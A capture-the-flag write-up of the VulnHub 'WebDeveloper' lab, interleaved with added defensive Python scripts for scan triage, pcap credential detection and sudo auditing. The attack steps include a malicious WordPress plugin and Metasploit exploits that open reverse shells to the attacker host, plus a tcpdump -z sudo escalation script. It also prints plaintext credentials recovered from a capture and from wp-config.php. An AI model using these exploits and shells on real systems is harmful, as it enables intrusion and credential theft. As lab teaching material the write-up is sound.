WebDeveloper
Target IP: 10.0.2.6 by sc00by

########## NMAP Scan: ##########

root@kalilinux:~/Documents/VulnHub/WebDeveloper# nmap -sT -p- 10.0.2.6
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-20 13:16 CDT
Nmap scan report for 10.0.2.6
Host is up (0.0016s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:CC:54:C9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 11.18 seconds
[~!~] A web server running on the box named "WebDeveloper" ...seems appropriate!

########### Web Server: ###########

####################### Mapping the Web server: #######################

[~!~] I hadn't run a typical dirbuster yet, so I decided to see if there were any interesting files on the web server.
root@kalilinux:~/Documents/VulnHub/WebDeveloper# dirbuster
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
Dir found: /.hta/ - 403
Dir found: /.htaccess/ - 403
Dir found: /.htpasswd/ - 403
Dir found: / - 200
Dir found: /index.php/ - 301
Dir found: /index.php/2018/ - 200
Dir found: /index.php/2018/10/ - 200
Dir found: /index.php/2018/10/30/ - 200
Dir found: /index.php/2018/10/30/hello-world/ - 200
Dir found: /index.php/category/uncategorized/ - 200
File found: /wp-login.php - 200
Dir found: /index.php/feed/ - 200
Dir found: /index.php/comments/feed/ - 200
Dir found: /wp-content/ - 200
Dir found: /wp-content/themes/ - 200
Dir found: /wp-content/themes/twentyseventeen/ - 500
Dir found: /wp-content/themes/twentyseventeen/assets/ - 200
Dir found: /wp-content/themes/twentyseventeen/assets/images/ - 200
Dir found: /wp-includes/ - 200
Dir found: /wp-includes/js/ - 200
Dir found: /wp-includes/js/jquery/ - 200
File found: /wp-includes/js/jquery/jquery.js - 200
File found: /wp-includes/js/jquery/jquery-migrate.min.js - 200
Dir found: /wp-content/themes/twentyseventeen/assets/js/ - 200
File found: /wp-content/themes/twentyseventeen/assets/js/skip-link-focus-fix.js - 200
Dir found: /wp-content/themes/twentyseventeen/assets/css/ - 200
Dir found: /icons/ - 403
File found: /wp-content/themes/twentyseventeen/assets/js/global.js - 200
File found: /wp-content/themes/twentyseventeen/assets/js/jquery.scrollTo.js - 200
File found: /wp-content/themes/twentyseventeen/assets/images/svg-icons.svg - 200
File found: /wp-includes/js/wp-embed.min.js - 200
File found: /wp-includes/js/jquery/jquery-migrate.js - 200
File found: /wp-includes/js/jquery/jquery.color.min.js - 200
File found: /wp-includes/js/jquery/jquery.form.js - 200
File found: /wp-content/themes/twentyseventeen/assets/js/customize-controls.js - 200
File found: /wp-includes/js/jquery/jquery.form.min.js - 200
Dir found: /ipdata/ - 200
File found: /wp-content/themes/twentyseventeen/assets/css/colors-dark.css - 200
File found: /wp-content/themes/twentyseventeen/assets/js/customize-preview.js - 200
File found: /wp-includes/js/jquery/jquery.hotkeys.js - 200
File found: /wp-content/themes/twentyseventeen/assets/css/editor-style.css - 200
File found: /wp-content/themes/twentyseventeen/assets/js/html5.js - 200
File found: /wp-includes/js/jquery/jquery.hotkeys.min.js - 200
File found: /wp-content/themes/twentyseventeen/assets/css/ie8.css - 200
File found: /wp-content/themes/twentyseventeen/assets/js/navigation.js - 200
File found: /wp-content/themes/twentyseventeen/assets/css/ie9.css - 200
File found: /wp-includes/js/jquery/jquery.masonry.min.js - 200
File found: /wp-includes/js/jquery/jquery.query.js - 200
File found: /wp-includes/js/jquery/jquery.schedule.js - 200
File found: /wp-includes/js/jquery/jquery.serialize-object.js - 200
File found: /wp-includes/js/jquery/jquery.table-hotkeys.js - 200
File found: /wp-includes/js/jquery/jquery.table-hotkeys.min.js - 200
File found: /wp-includes/js/jquery/jquery.ui.touch-punch.js - 200
File found: /wp-includes/js/jquery/suggest.js - 200
File found: /wp-includes/js/jquery/suggest.min.js - 200
Dir found: /wp-includes/js/jquery/ui/ - 200
File found: /ipdata/analyze.cap - 200
Dir found: /server-status/ - 403
Dir found: /wp-admin/ - 302
Dir found: /xmlrpc.php/ - 405
DirBuster Stopped
[~!~] Indeed, an interesting file HAS been found:
/ipdata/analyze.cap
A packet capture file! We can assess this in Wireshark.
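The thing that made /ipdata/analyze.cap stand out in that long DirBuster list is that it sits outside the WordPress tree and is retrievable (200). That triage can be done mechanically, which is also what a defender does when reviewing a scan of their own site for files that should not be exposed. The script below is an added example, not part of the write-up: it parses DirBuster's "Dir found:"/"File found:" lines (the regex also works on the flattened one-line paste above), treats a stock WordPress root layout as expected (the WORDPRESS_ROOT set is an assumption about a default install), and reports anything else that actually answers 200. The sample input is a constructed subset of the output above.

```python
import re

# Constructed sample: a subset of the DirBuster output from this write-up.
SAMPLE_DIRBUSTER = """\
Dir found: /.htaccess/ - 403
Dir found: / - 200
Dir found: /index.php/ - 301
Dir found: /index.php/2018/10/30/hello-world/ - 200
File found: /wp-login.php - 200
Dir found: /wp-content/themes/twentyseventeen/ - 500
File found: /wp-includes/js/jquery/jquery.js - 200
Dir found: /icons/ - 403
Dir found: /ipdata/ - 200
File found: /ipdata/analyze.cap - 200
Dir found: /server-status/ - 403
Dir found: /wp-admin/ - 302
Dir found: /xmlrpc.php/ - 405
DirBuster Stopped
"""

# One DirBuster hit; matches line-by-line output and the flattened paste alike.
ENTRY_RE = re.compile(r"(Dir|File) found: (\S+) - (\d{3})")

# Top-level names of a stock WordPress install ("" is the site root "/").
# Assumption for this example; adjust to the deployment being reviewed.
WORDPRESS_ROOT = {"", "index.php", "wp-login.php", "wp-content", "wp-includes",
                  "wp-admin", "xmlrpc.php", "wp-cron.php", "wp-json"}


def parse_dirbuster(text):
    """Return (kind, path, status) for every hit in DirBuster output."""
    return [(kind, path, int(status)) for kind, path, status in ENTRY_RE.findall(text)]


def triage(text):
    """Bucket hits: denied by the server, part of WordPress itself, or
    unexpected (outside the WordPress tree, with the status the server returned)."""
    report = {"denied": [], "wordpress": [], "unexpected": []}
    for _kind, path, status in parse_dirbuster(text):
        top = path.strip("/").split("/")[0]
        if status in (401, 403):
            report["denied"].append(path)
        elif top in WORDPRESS_ROOT:
            report["wordpress"].append(path)
        else:
            report["unexpected"].append((path, status))
    return report


def exposed_unexpected(text):
    """Only the unexpected paths that are actually retrievable (HTTP 200)."""
    return [path for path, status in triage(text)["unexpected"] if status == 200]


if __name__ == "__main__":
    for path in exposed_unexpected(SAMPLE_DIRBUSTER):
        print("review:", path)
```

On the sample this flags exactly /ipdata/ and /ipdata/analyze.cap; the 403 entries (/icons/, /server-status/, the dotfiles) are Apache defaults the server already refuses to serve.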

################### Wireshark Analysis: ###################

root@kalilinux:~/Documents/VulnHub/WebDeveloper# wget http://10.0.2.6/ipdata/analyze.cap
--2019-04-21 10:58:04--  http://10.0.2.6/ipdata/analyze.cap
Connecting to 10.0.2.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2977836 (2.8M) [application/vnd.tcpdump.pcap]
Saving to: ‘analyze.cap’

analyze.cap         100%[======================>]   2.84M  --.-KB/s    in 0.1s

2019-04-21 10:58:04 (22.8 MB/s) - ‘analyze.cap’ saved [2977836/2977836]

root@kalilinux:~/Documents/VulnHub/WebDeveloper# ls
analyze.cap  index.html
root@kalilinux:~/Documents/VulnHub/WebDeveloper# file analyze.cap
analyze.cap: pcap capture file, microsecond ts (little-endian) - version 2.4 (Ethernet, capture length 262144)
[~!~] Now we target it with Wireshark!
root@kalilinux:~/Documents/VulnHub/WebDeveloper# wireshark analyze.cap
[~!~] I found a couple of interesting looking cookies to play with.
[~!~] And then we just hit the motherlode: We get some credentials:
USER: webdeveloper
PASS: Te5eQg&4sBS!Yr$)wf%(DcAd
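The credentials came out of the capture because the wp-login.php form was submitted over plain HTTP, so the POST body sits in the pcap in the clear. Checking a stored capture for exactly that kind of leak is a routine audit task. The following is an added example, not code from the write-up: a minimal classic-pcap reader (global header, per-record headers, Ethernet/IPv4/TCP) that pulls out HTTP POST bodies and reports any form with a user/password pair, using WordPress's real field names (log and pwd) plus a few common alternatives. The capture it runs on is constructed inline (one GET and one login POST with a made-up password), since the real analyze.cap is not reproduced here; addresses and the MAC are taken from the write-up.

```python
import struct
from urllib.parse import parse_qs, urlencode

PCAP_MAGIC_LE = 0xa1b2c3d4   # microsecond timestamps, little-endian (as `file` reported)
LINKTYPE_ETHERNET = 1


def build_frame(payload, src_port=51514, dst_port=80):
    """Constructed Ethernet/IPv4/TCP frame carrying `payload` (checksums left at zero)."""
    tcp = struct.pack("!HHIIBBHHH", src_port, dst_port, 1, 1, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 1, 0x4000,
                     64, 6, 0, bytes([10, 0, 2, 15]), bytes([10, 0, 2, 6]))
    eth = bytes.fromhex("080027cc54c9") + bytes.fromhex("080027000001") + b"\x08\x00"
    return eth + ip + tcp + payload


def build_sample_pcap(user, password):
    """Constructed capture: one GET and one wp-login.php POST, as a browser would send them."""
    body = urlencode({"log": user, "pwd": password, "wp-submit": "Log In"}).encode()
    post = (b"POST /wp-login.php HTTP/1.1\r\nHost: 10.0.2.6\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            + f"Content-Length: {len(body)}\r\n\r\n".encode() + body)
    get = b"GET /index.php HTTP/1.1\r\nHost: 10.0.2.6\r\n\r\n"
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 262144, LINKTYPE_ETHERNET)
    for ts, frame in ((1555862000, build_frame(get)), (1555862003, build_frame(post))):
        out += struct.pack("<IIII", ts, 0, len(frame), len(frame)) + frame
    return out


def iter_pcap_frames(data):
    """Yield raw link-layer frames from a classic (non-pcapng) pcap in either byte order."""
    magic, = struct.unpack_from("<I", data, 0)
    if magic == PCAP_MAGIC_LE:
        endian = "<"
    elif magic == 0xd4c3b2a1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file")
    linktype, = struct.unpack_from(endian + "I", data, 20)
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from(endian + "IIII", data, off)
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def tcp_payload(frame):
    """Return the TCP payload of an IPv4/TCP frame, or None for anything else."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
        return None
    ihl = (frame[14] & 0x0f) * 4
    tcp_off = 14 + ihl
    data_off = (frame[tcp_off + 12] >> 4) * 4
    return frame[tcp_off + data_off:]


def find_form_credentials(pcap_bytes, user_keys=("log", "username", "user"),
                          pass_keys=("pwd", "password", "pass")):
    """Report every HTTP POST whose urlencoded body carries a user/password pair."""
    findings = []
    for frame in iter_pcap_frames(pcap_bytes):
        payload = tcp_payload(frame)
        if not payload or not payload.startswith(b"POST "):
            continue
        head, sep, body = payload.partition(b"\r\n\r\n")
        if not sep:
            continue
        fields = parse_qs(body.decode("utf-8", "replace"))
        user = next((fields[k][0] for k in user_keys if k in fields), None)
        secret = next((fields[k][0] for k in pass_keys if k in fields), None)
        if user is not None and secret is not None:
            request_line = head.split(b"\r\n", 1)[0].decode("ascii", "replace")
            findings.append({"request": request_line, "user": user, "password": secret})
    return findings


def mask(secret):
    """Keep only the first two characters when printing a report."""
    return secret[:2] + "*" * max(len(secret) - 2, 0)


if __name__ == "__main__":
    capture = build_sample_pcap("webdeveloper", "S3cret&Pass!")   # constructed values
    for f in find_form_credentials(capture):
        print(f"{f['request']}: user={f['user']} password={mask(f['password'])}")
```

The parser deliberately stops at the first TCP segment of each POST; a real login form fits in one segment, and a fuller tool would reassemble streams. The password is masked in the report because the finding is the leak itself, not the secret.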

##################### Reverse Shell Take 1: #####################

[~!~] I went ahead and checked out the plugins, since I had done a malicious plugin on a different VulnHub box in the past. There is a malicious plugin generator here: https://github.com/wetw0rk/malicious-wordpress-plugin
root@kalilinux:~/tools/wordpress/malicious-wordpress-plugin# python wordpwn.py 10.0.2.15 7172 Y
[*] Checking if msfvenom installed
[+] msfvenom installed
[+] Generating plugin script
[+] Writing plugin script to file
[+] Generating payload To file
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1503 (iteration=0)
php/base64 chosen with final size 1503
Payload size: 1503 bytes
[+] Writing files to zip
[+] Cleaning up files
[+] General Execution Location: http://(target)/wp-content/plugins/malicous/
[+] General Upload Location: http://(target)/wp-admin/plugin-install.php?tab=upload
[+] Launching handler
[ ok ] Starting postgresql (via systemctl): postgresql.service.
[*] Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file

[metasploit banner]

       =[ metasploit v5.0.16-dev                          ]
+ -- --=[ 1876 exploits - 1061 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

[*] Processing wordpress.rc for ERB directives.
resource (wordpress.rc)> use exploit/multi/handler
resource (wordpress.rc)> set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
resource (wordpress.rc)> set LHOST 10.0.2.15
LHOST => 10.0.2.15
resource (wordpress.rc)> set LPORT 7172
LPORT => 7172
resource (wordpress.rc)> exploit
[*] Started reverse TCP handler on 10.0.2.15:7172
[~!~] So now we should have a reverse shell handler. Alongside that, wordpwn gives you a malicous.zip to upload.
root@kalilinux:~/Documents/VulnHub/WebDeveloper# ls -la ~/tools/wordpress/malicious-wordpress-plugin/malicous.zip
-rw-r--r-- 1 root root 1885 Apr 21 11:49 /root/tools/wordpress/malicious-wordpress-plugin/malicous.zip
[~!~] It was at this point that this reverse shell had failed me :[ There was still hope for one yet! There's another method...

##################### Reverse Shell Take 2: #####################

[~!~] The reverse shell I used for HackInOS:1 can actually be applied straight to a config within our user panel!
Source:
-------
http://pentestmonkey.net/tools/php-reverse-shell
Then, we can paste our shell into the Appearance -> Editor section! Then we just need to start a listener:
root@kalilinux:~/Documents/VulnHub/WebDeveloper# nc -lvp 7172
listening on [any] 7172 ...
[~!~] Aaaaaaaaand nothing. Another failed attempt at a reverse shell, but ALAS I found one more way to attempt to gain a shell from wordpress!

##################### Reverse Shell Take 3: #####################

[~!~] This one uses a metasploit module that attempts to pivot off of a plugin yet again.
root@kalilinux:~/Documents/VulnHub/WebDeveloper# msfconsole
[*] Starting the Metasploit Framework console...
[-] * WARNING: No database support: No database YAML file

[metasploit banner]

       =[ metasploit v5.0.16-dev                          ]
+ -- --=[ 1876 exploits - 1061 auxiliary - 328 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > search reflex

Matching Modules
================

   #  Name                                               Disclosure Date  Rank       Check  Description
   -  ----                                               ---------------  ----       -----  -----------
   1  exploit/unix/webapp/wp_reflexgallery_file_upload  2012-12-30       excellent  Yes    Wordpress Reflex Gallery Upload Vulnerability

msf5 > use exploit/unix/webapp/wp_reflexgallery_file_upload
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > show options

Module options (exploit/unix/webapp/wp_reflexgallery_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Reflex Gallery 3.1.3

[~!~] Then I made sure to have the following plugins.
[~!~] Now we'll just set our options and attempt to get our reverse shell hopefully :D
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > set RHOSTS 10.0.2.6
RHOSTS => 10.0.2.6
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit

[*] Started reverse TCP handler on 10.0.2.15:4444
[+] Our payload is at: jLuivOgatUrX.php. Calling payload...
[*] Calling payload...
[*] Sending stage (38247 bytes) to 10.0.2.6
[*] Meterpreter session 1 opened (10.0.2.15:4444 -> 10.0.2.6:42074) at 2019-04-21 14:24:30 -0500
[+] Deleted jLuivOgatUrX.php

meterpreter > shell
Process 1417 created.
Channel 0 created.
whoami
www-data
[~!~] FINALLY WE GOT OUR REVERSE SHELL!! Albeit an ugly one xD Sometimes persistence is key.

############################ Searching the Web Directory: ############################

[~!~] The database config file: wp-config.php
find / -name wp-config.php 2>/dev/null
/var/www/html/wp-config.php
[~!~] This was found within /var/www/html/wp-config.php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'webdeveloper');

/** MySQL database password */
define('DB_PASSWORD', 'MasterOfTheUniverse');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
[~!~] Some creds (possibly SSH?):
DB_USER: webdeveloper
DB_PASSWORD: MasterOfTheUniverse

####### SSH in: #######

root@kalilinux:~/Documents/VulnHub/WebDeveloper# ssh webdeveloper@10.0.2.6
The authenticity of host '10.0.2.6 (10.0.2.6)' can't be established.
ECDSA key fingerprint is SHA256:qgNlWWIX9wv+iLg9Bqpq+ENCHqG3lhlsM1bMQJygYDM.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.0.2.6' (ECDSA) to the list of known hosts.
webdeveloper@10.0.2.6's password:
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-47-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Apr 21 19:41:02 UTC 2019

  System load:  0.0               Processes:           107
  Usage of /:   25.9% of 19.56GB  Users logged in:     0
  Memory usage: 45%               IP address for eth0: 10.0.2.6
  Swap usage:   0%

  => There is 1 zombie process.

 * Ubuntu's Kubernetes 1.14 distributions can bypass Docker and use containerd
   directly, see https://bit.ly/ubuntu-containerd or try it now with

     snap install microk8s --classic

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

105 packages can be updated.
4 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Oct 30 09:25:27 2018 from 192.168.1.114
webdeveloper@webdeveloper:~$
[~!~] We have an ssh session on the box as webdeveloper now!

########### On the box: ###########

webdeveloper@webdeveloper:~$ sudo -l
[sudo] password for webdeveloper:
Matching Defaults entries for webdeveloper on webdeveloper:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webdeveloper may run the following commands on webdeveloper:
    (root) /usr/sbin/tcpdump
webdeveloper@webdeveloper:~$
[~!~] This should be a quick pivot to root! We can execute tcpdump as root without sudo password! I believe I have used this pivot before in my TempleOfDoom writeup.

Several hours later...

[~!~] The method for this tcpdump pivot was NOT the same idea as the TempleOfDoom one. Here is the method:

STEP 1
======
SSH Session 1:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
webdeveloper@webdeveloper:~$ pico mk_exploit.sh
webdeveloper@webdeveloper:~$ chmod +x mk_exploit.sh
webdeveloper@webdeveloper:~$ cat mk_exploit.sh
#!/bin/bash
cd /tmp
COMMAND='cat /root/flag.txt'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
webdeveloper@webdeveloper:~$ ./mk_exploit.sh
tcpdump: listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

STEP 2
======
SSH Session 2:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
webdeveloper@webdeveloper:~$ nc -v -z -n -w 1 127.0.0.1 7172
nc: connect to 127.0.0.1 port 7172 (tcp) failed: Connection refused
webdeveloper@webdeveloper:~$
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

STEP 3
======
SSH Session 1:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
webdeveloper@webdeveloper:~$
Congratulations here is youre flag: cba045a5a4f26f1cd8d7be9a5c2b1b34f6c5d290
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[~!~] And there's the root flag!!!
cba045a5a4f26f1cd8d7be9a5c2b1b34f6c5d290
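The whole privilege escalation rests on one sudoers line, (root) /usr/sbin/tcpdump, and on tcpdump's -z option running a post-rotate command with tcpdump's own privileges. Reviewing sudo grants for exactly this pattern is something a defender can script. Below is an added example, not part of this write-up: it parses the output of `sudo -l` (the sample is the output shown above plus two constructed entries, a NOPASSWD line and an ALL line, to exercise the parser) and flags entries that hand out unrestricted sudo, skip the password, or grant root on a binary with a documented command-execution hook. The ARBITRARY_EXEC table lists only tcpdump, since that is the case this page demonstrates; a real audit would populate it from its own threat model. The fix the audit points at is to remove the grant or pin it to the exact command line the user actually needs.

```python
import re

# Constructed sample: the `sudo -l` output from this write-up, plus two
# made-up entries (NOPASSWD and ALL) so the parser's other branches are exercised.
SAMPLE_SUDO_L = """\
Matching Defaults entries for webdeveloper on webdeveloper:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User webdeveloper may run the following commands on webdeveloper:
    (root) /usr/sbin/tcpdump
    (root) NOPASSWD: /usr/bin/systemctl status apache2
    (ALL : ALL) ALL
"""

# "(runas) [TAG: ...] command", as printed in the "may run" block of `sudo -l`.
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")

# Binaries whose sudo grant gives the caller arbitrary command execution as the
# run-as user through a documented feature. Only the case shown in this
# write-up is listed; extend it for your own environment.
ARBITRARY_EXEC = {
    "/usr/sbin/tcpdump": "-z runs a post-rotate command with tcpdump's privileges",
}


def parse_sudo_l(text):
    """Return the command entries of `sudo -l` output as dicts (runas, tags, cmd)."""
    entries = []
    in_commands = False
    for line in text.splitlines():
        if re.match(r"^User \S+ may run the following commands", line):
            in_commands = True
            continue
        if not in_commands or not line.strip():
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = [t.rstrip(":") for t in m.group("tags").split()]
        entries.append({"runas": m.group("runas").strip(), "tags": tags, "cmd": m.group("cmd")})
    return entries


def audit_sudo_l(text):
    """Return (command, reason) pairs for grants a reviewer should look at."""
    findings = []
    for entry in parse_sudo_l(text):
        runas_user = entry["runas"].split(":")[0].strip()
        as_root = runas_user in ("root", "ALL")
        binary = entry["cmd"].split()[0]
        if entry["cmd"] == "ALL":
            findings.append((entry["cmd"], "unrestricted sudo"))
        elif as_root and binary in ARBITRARY_EXEC:
            findings.append((entry["cmd"], ARBITRARY_EXEC[binary]))
        if "NOPASSWD" in entry["tags"]:
            findings.append((entry["cmd"], "no password required"))
    return findings


if __name__ == "__main__":
    for cmd, reason in audit_sudo_l(SAMPLE_SUDO_L):
        print(f"{cmd!r}: {reason}")
```

Note that the tcpdump entry is flagged even though it requires the user's own password: the point of the finding is that the grant, as written, does not constrain the arguments, so the password only gates who may use it, not what it can do.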
~sc00by